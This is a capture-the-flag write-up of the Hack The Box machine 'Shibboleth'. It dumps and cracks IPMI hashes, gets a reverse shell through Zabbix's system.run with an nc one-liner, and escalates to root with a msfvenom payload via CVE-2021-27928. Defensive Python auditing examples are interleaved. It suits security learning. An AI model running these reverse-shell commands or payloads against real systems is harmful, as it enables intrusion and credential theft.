Shibboleth Write Up — Hack the box

Nmap
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth]
└─$ cat nmap/shibboleth.nmap
# Nmap 7.91 scan initiated Sun Nov 21 00:52:50 2021 as: nmap -sS -sC -sV -oA nmap/shibboleth 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.55s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 21 00:53:21 2021 -- 1 IP address (1 host up) scanned in 31.68 seconds
The Nmap scan shows only one open TCP port, and it redirects to http://shibboleth.htb. Let's add this domain to our /etc/hosts file.
There is not much to go on, so let's scan all ports with Nmap. A new port, 623 (UDP), turns out to be open, so let's run Nmap again against just that port to identify the service and version running there:
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth]
└─$ sudo nmap -sU -sC -sV -p623 10.10.11.124
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 06:24 EST
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.91%I=7%D=11/23%Time=619CCF90%P=x86_64-pc-linux-gnu%r(ip
SF:mi-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\x0
SF:1\x97\x04\x03\0\0\0\0\t");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds
So an asf-rmcp service is running on 623/udp.
Web enumeration
Let’s take a look at the website

The footer mentions Zabbix.

A quick Google search shows that Zabbix is an open-source network and application monitoring tool. More information can be found on its website: https://www.zabbix.com/
We can start with directory fuzzing using gobuster, but it doesn't turn up much:
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth/web]
└─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -u http://shibboleth.htb -o shibboleth
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shibboleth.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/23 05:37:36 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 317] [--> http://shibboleth.htb/assets/]
/forms (Status: 301) [Size: 316] [--> http://shibboleth.htb/forms/]
--------snip----------
We didn't get much information. Let's fuzz for virtual hosts using ffuf:
└─$ ffuf -u 'http://shibboleth.htb/' -H "Host: FUZZ.shibboleth.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://shibboleth.htb/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.shibboleth.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
monitor [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix [Status: 200, Size: 3686, Words: 192, Lines: 30]
:: Progress: [4989/4989] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:42] :: Errors: 0 ::
There are three virtual hosts; let's add them to the hosts file.
VHOST

All three redirect to the same login page. Default credentials didn't work.
Port 623 enumeration
On the remote host there was another port, 623/udp, running an Alert Standard Format (ASF) device that can be controlled remotely using the Remote Management and Control Protocol (RMCP). More info can be found at https://en.wikipedia.org/wiki/Alert_Standard_Format
After some Googling we find the IPMI page at https://book.hacktricks.xyz/pentesting/623-udp-ipmi
Using Metasploit we can scan for additional information, e.g. check whether the BMC is vulnerable to the cipher zero authentication bypass:
msf6 > search ipmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ipmi/ipmi_cipher_zero 2013-06-20 normal No IPMI 2.0 Cipher Zero Authentication Bypass Scanner
1 auxiliary/scanner/ipmi/ipmi_dumphashes 2013-06-20 normal No IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
2 auxiliary/scanner/ipmi/ipmi_version normal No IPMI Information Discovery
3 exploit/multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution
4 auxiliary/scanner/http/smt_ipmi_cgi_scanner 2013-11-06 normal No Supermicro Onboard IPMI CGI Vulnerability Scanner
5 auxiliary/scanner/http/smt_ipmi_49152_exposure 2014-06-19 normal No Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
6 auxiliary/scanner/http/smt_ipmi_static_cert_scanner 2013-11-06 normal No Supermicro Onboard IPMI Static SSL Certificate Scanner
7 exploit/linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow
8 auxiliary/scanner/http/smt_ipmi_url_redirect_traversal 2013-11-06 normal No Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/http/smt_ipmi_url_redirect_traversal
msf6 > use 0
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
It is vulnerable to cipher zero. Let's dump the user hash:
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:2fe3f04982050000744fe26c7c83b789b44c5de39c1930f9f246411b15918ddad2a64c16d1926548a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e825eb0fe28d22ccb4b20bd8b65a181da3ce07b6
-------- snip-----
Now let's crack the hash using hashcat:
└─$ hashcat -m 7300 hash /opt/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz, 1399/1463 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

44b44d0882010000abf3b8306f2693ce4903d2c995f166373ef521f72f9172d2e08e4fe4e41e1e05a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e5ca3708e74db3d676ee14fc61af488815f8416c:ilovepumkinpie1
---------------------snip--------
We successfully cracked the password:
└─$ hashcat -m 7300 hash /opt/rockyou.txt --show
44b44d0882010000abf3b8306f2693ce4903d2c995f166373ef521f72f9172d2e08e4fe4e41e1e05a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e5ca3708e74db3d676ee14fc61af488815f8416c:ilovepumkinpie1
credentials = Administrator:ilovepumkinpie1
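The reason this hash can be attacked offline at all is the RAKP design: in RAKP message 2 the BMC returns an HMAC-SHA1, keyed with the user's password, over data the client already knows, before the client has proven anything. The Python below is an added example, not part of the write-up and not code from hashcat or Metasploit; it decodes the salt half of the mode 7300 line above into those fields, assuming the layout Metasploit's ipmi_dumphashes emits (console and BMC session IDs, console and BMC random numbers, BMC GUID, role byte, username length, username). The sample line is the one printed by --show above.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed from the write-up: the line hashcat printed with --show (salt:hmac:password).
SAMPLE_LINE = (
    "44b44d0882010000abf3b8306f2693ce4903d2c995f166373ef521f72f9172d2e08e4fe4e41e1e05"
    "a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72"
    ":e5ca3708e74db3d676ee14fc61af488815f8416c:ilovepumkinpie1"
)

# IPMI 2.0 requested privilege level lives in the low nibble of the role byte;
# bit 4 flags "name-only lookup" (no privilege-level check in the lookup).
PRIV_LEVELS = {1: "CALLBACK", 2: "USER", 3: "OPERATOR", 4: "ADMINISTRATOR", 5: "OEM"}
NAME_ONLY_LOOKUP = 0x10


@dataclass
class RakpRecord:
    console_session_id: str
    bmc_session_id: str
    console_random: str
    bmc_random: str
    bmc_guid: str
    role: int
    username: str
    hmac_sha1: str
    password: Optional[str]


def parse_rakp_line(line: str) -> RakpRecord:
    """Split a hashcat -m 7300 line into the RAKP message 2 fields (assumed field order)."""
    parts = line.strip().split(":")
    if len(parts) < 2:
        raise ValueError("expected salt:hmac[:password]")
    salt = bytes.fromhex(parts[0])
    digest = parts[1].lower()
    if len(digest) != 40:
        raise ValueError("HMAC-SHA1 must be 20 bytes")
    if len(salt) < 58:
        raise ValueError("salt shorter than the fixed RAKP fields")
    ulen = salt[57]
    username = salt[58:58 + ulen]
    # The length byte must account for exactly the remaining bytes.
    if len(username) != ulen or salt[58 + ulen:]:
        raise ValueError("username length byte disagrees with salt length")
    return RakpRecord(
        console_session_id=salt[0:4].hex(),
        bmc_session_id=salt[4:8].hex(),
        console_random=salt[8:24].hex(),
        bmc_random=salt[24:40].hex(),
        bmc_guid=salt[40:56].hex(),
        role=salt[56],
        username=username.decode("ascii"),
        hmac_sha1=digest,
        password=parts[2] if len(parts) > 2 else None,
    )


def privilege_name(role: int) -> str:
    return PRIV_LEVELS.get(role & 0x0F, f"UNKNOWN({role & 0x0F})")


def uses_name_only_lookup(role: int) -> bool:
    return bool(role & NAME_ONLY_LOOKUP)


def summary(rec: RakpRecord) -> list:
    """Human-readable view: everything in the HMAC input is attacker-visible except the key."""
    return [
        f"user={rec.username} requested_priv={privilege_name(rec.role)}"
        f" name_only_lookup={uses_name_only_lookup(rec.role)}",
        f"bmc_guid={rec.bmc_guid} bmc_session={rec.bmc_session_id}",
        f"hmac_sha1={rec.hmac_sha1} (keyed by the account password, returned unauthenticated)",
    ]


if __name__ == "__main__":
    for line in summary(parse_rakp_line(SAMPLE_LINE)):
        print(line)
```

Every field that goes into the HMAC except the password is either chosen by the client or handed over by the BMC, so the only secret is the password itself; that is why a dictionary attack on a 13-character username with an administrator role works here. The defensive consequences are the usual ones for IPMI 2.0: keep 623/udp off any network an attacker can reach, and use long random BMC passwords, since the protocol gives nothing else to lean on.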
We can use these credentials to log in to the website.
At the bottom of the page the Zabbix version is shown.
Reading the Zabbix documentation, we find that we can run remote commands through the Zabbix agent via the system.run item key. More details: https://www.zabbix.com/documentation/current/manual/config/items/itemtypes/zabbix_agent
getting shell

- From the dashboard go to Configuration > Hosts > Items
- Click Create item
- Set the key to: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc "your-ip" "port" >/tmp/f &,nowait]
- Set up an nc listener
- Click Test > Get value and test
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth/web]
└─$ nc -lnvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.11.124.
Ncat: Connection from 10.10.11.124:50082.
sh: 0: can't access tty; job control turned off
$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
zabbix@shibboleth:/$
Now we have a reverse shell.
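The control that decides whether this step works is the agent's AllowKey/DenyKey rule list (Zabbix 5.0 and later; older agents use EnableRemoteCommands instead). The Python below is an added example, not code from the write-up or from Zabbix: a small audit that parses a zabbix_agentd.conf, applies the rules in file order with the same first-match semantics, and reports whether a system.run[] key would still be executed. The two configurations are constructed samples, the key under test uses a harmless command, and the wildcard matcher is a simplification of Zabbix's own (only * is treated as special).

```python
import re

# Constructed sample agent configurations (not the box's real files).
WEAK_CONF = """\
Server=10.10.11.124
# an admin opened up remote commands for a one-off job and never closed them
AllowKey=system.run[*]
"""

HARDENED_CONF = """\
Server=10.10.11.124
# allow one vetted script, deny every other system.run[] key
AllowKey=system.run[/usr/local/bin/check_backup.sh]
DenyKey=system.run[*]
"""

# Shape of the key abused in the write-up, with a harmless command substituted.
SHELL_KEY = "system.run[id,nowait]"


def parse_rules(conf_text):
    """Return AllowKey/DenyKey rules in file order as (allow, pattern) tuples."""
    rules = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition("=")
        name, value = name.strip(), value.strip()
        if name in ("AllowKey", "DenyKey"):
            rules.append((name == "AllowKey", value))
    return rules


def _split_key(key):
    """'system.run[id]' -> ('system.run', 'id'); 'system.run' -> ('system.run', None)."""
    m = re.fullmatch(r"([^\[\]]+)(?:\[(.*)\])?", key.strip())
    if not m:
        raise ValueError(f"malformed item key: {key!r}")
    return m.group(1), m.group(2)


def _wild(pattern, text):
    """Glob-style match where only '*' is special (simplified Zabbix matching, an assumption)."""
    rx = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(rx, text) is not None


def rule_matches(pattern, key):
    pkey, pparams = _split_key(pattern)
    kkey, kparams = _split_key(key)
    if not _wild(pkey, kkey):
        return False
    if pparams is None:            # a rule without brackets matches only a bare key
        return kparams is None
    return kparams is not None and _wild(pparams, kparams)


def is_key_allowed(key, rules):
    """First matching rule wins; Zabbix 5.0+ allows any key no rule mentions."""
    for allow, pattern in rules:
        if rule_matches(pattern, key):
            return allow
    return True


def audit(conf_text):
    """List the findings a reviewer would raise for this agent configuration."""
    findings = []
    if is_key_allowed(SHELL_KEY, parse_rules(conf_text)):
        findings.append("system.run[*] reachable: anyone who can create or test items "
                        "for this host runs commands as the agent user")
    for raw in conf_text.splitlines():
        name, _, value = raw.strip().partition("=")
        if name.strip() == "EnableRemoteCommands" and value.strip() == "1":
            findings.append("legacy EnableRemoteCommands=1 set")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf) or ["no findings"])
```

The hardened sample shows the pattern worth copying: list the specific system.run[] commands monitoring genuinely needs, then close the class with DenyKey=system.run[*]. The frontend side matters as well, since the item test button runs with whatever the agent allows; an account with item-creation rights on a host is effectively a shell on that host unless the agent refuses the key.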
Privilege Escalation
First, let's run linpeas.sh:
- On the attacking (host) machine, serve the folder containing the linpeas script with a simple HTTP server: python3 -m http.server 80
- On the victim machine download linpeas: wget "http://10.10.16.21/linpeas.sh" -O /tmp/linpeas.sh
- chmod +x /tmp/linpeas.sh
- /tmp/linpeas.sh
privilege escalation to ipmi-svc
There is another user called ipmi-svc, who uses the same password we recovered earlier, ilovepumkinpie1.
While enumerating we find the file /etc/zabbix/zabbix_server.conf, which contains the database name, user and password:
-----snip-----
### Option: DBName
# Database name.
# Mandatory: yes
# Default:
# DBName=
DBName=zabbix
### Option: DBSchema
#Schema name. Used for PostgreSQL.
# Mandatory: no
# Default:
# DBSchema=
### Option: DBUser
#Database user.
# Mandatory: no
# Default:
# DBUser=
DBUser=zabbix
### Option: DBPassword
# Database password.
# Comment this line if no password is used.
# Mandatory: no
# Default:
DBPassword=bloooarskybluh
------snip----
Database credentials:
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
Now let's take a look at the database:
ipmi-svc@shibboleth:/etc/zabbix$ mysql -D zabbix -u zabbix -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1019
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [zabbix]>
MariaDB version 10.3.25-MariaDB-0ubuntu0.20.04.1 (Ubuntu 20.04) is running on the host.
Password hashes found in the users table:
MariaDB [zabbix]> select alias, passwd from users;
+---------------+--------------------------------------------------------------+
| alias | passwd |
+---------------+--------------------------------------------------------------+
| Admin | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 |
| guest | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
| Administrator | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe |
+---------------+--------------------------------------------------------------+
These are bcrypt hashes ($2y$), so let's not try to crack them.
getting root
A quick Google search on the MariaDB version turns up the vulnerability CVE-2021-27928:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27928
The PoC can be found at https://github.com/Al1ex/CVE-2021-27928
Crafting the exploit:
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1236 -f elf-so -o CVE-2021-27928.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: CVE-2021-27928.so
- Transfer the exploit to the victim machine
- Set up an nc listener
- Connect to MySQL:
mysql -D zabbix -u zabbix -p
ipmi-svc@shibboleth:~$ mysql -D zabbix -u zabbix -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1510
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
- Execute the following command in the database:
SET GLOBAL wsrep_provider="/home/ipmi-svc/CVE-2021-27928.so";
MariaDB [zabbix]> SET GLOBAL wsrep_provider="/home/ipmi-svc/CVE-2021-27928.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [zabbix]>
Now we are root.
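As a defender, two things make this last step work and both can be checked explicitly: the server version predates the fix, and the database account the Zabbix server uses can run SET GLOBAL, which requires the SUPER privilege (granted directly or via ALL PRIVILEGES ON *.*). The Python below is an added example, not from the write-up or from the PoC repository: it parses the version banner shown at the MariaDB prompt above and a list of SHOW GRANTS lines, and reports both conditions. The grant lines are constructed samples, and the fixed-version table follows the CVE-2021-27928 advisory text (10.2.37, 10.3.28, 10.4.18, 10.5.9).

```python
import re

# The server version banner from the MariaDB prompt in the write-up.
VERSION_BANNER = "10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04"

# Constructed SHOW GRANTS outputs (not captured from the box).
GRANTS_OVERPRIVILEGED = [
    "GRANT ALL PRIVILEGES ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '<redacted>'",
]
GRANTS_LEAST_PRIVILEGE = [
    "GRANT USAGE ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '<redacted>'",
    "GRANT ALL PRIVILEGES ON `zabbix`.* TO `zabbix`@`localhost`",
]

# First patch release of each series carrying the CVE-2021-27928 fix (advisory text).
FIXED_IN = {(10, 2): 37, (10, 3): 28, (10, 4): 18, (10, 5): 9}


def parse_version(banner):
    """'10.3.25-MariaDB-...' -> (10, 3, 25)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", banner.strip())
    if not m:
        raise ValueError(f"unrecognised version banner: {banner!r}")
    return tuple(int(x) for x in m.groups())


def version_is_patched(version):
    """True/False for a series in the table; None when the series is not covered."""
    major, minor, patch = version
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return None
    return patch >= fixed


def can_set_global(grant_lines):
    """True if any grant conveys SUPER: named explicitly, or via ALL [PRIVILEGES] ON *.*."""
    for line in grant_lines:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\b", line, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        scope = m.group(2)
        if scope == "*.*" and privs & {"SUPER", "ALL PRIVILEGES", "ALL"}:
            return True
    return False


def assess(banner, grant_lines):
    """Findings for one (server, account) pair; an empty list means neither condition holds."""
    version = parse_version(banner)
    findings = []
    if version_is_patched(version) is False:
        findings.append("server %d.%d.%d predates the CVE-2021-27928 fix" % version)
    if can_set_global(grant_lines):
        findings.append("account holds SUPER: SET GLOBAL wsrep_provider / wsrep_notify_cmd is reachable")
    return findings


if __name__ == "__main__":
    for label, grants in (("overprivileged", GRANTS_OVERPRIVILEGED),
                          ("least-privilege", GRANTS_LEAST_PRIVILEGE)):
        print(label, assess(VERSION_BANNER, grants) or ["no findings"])
```

The Zabbix database user only needs privileges on the zabbix schema, as in GRANTS_LEAST_PRIVILEGE; with that grant the SET GLOBAL statement is refused whatever the server version, and the stolen DBPassword from zabbix_server.conf stops being a path to code execution in mysqld. Since the library is loaded into the mysqld process, the resulting shell inherits mysqld's user, which is how the write-up ends up as root.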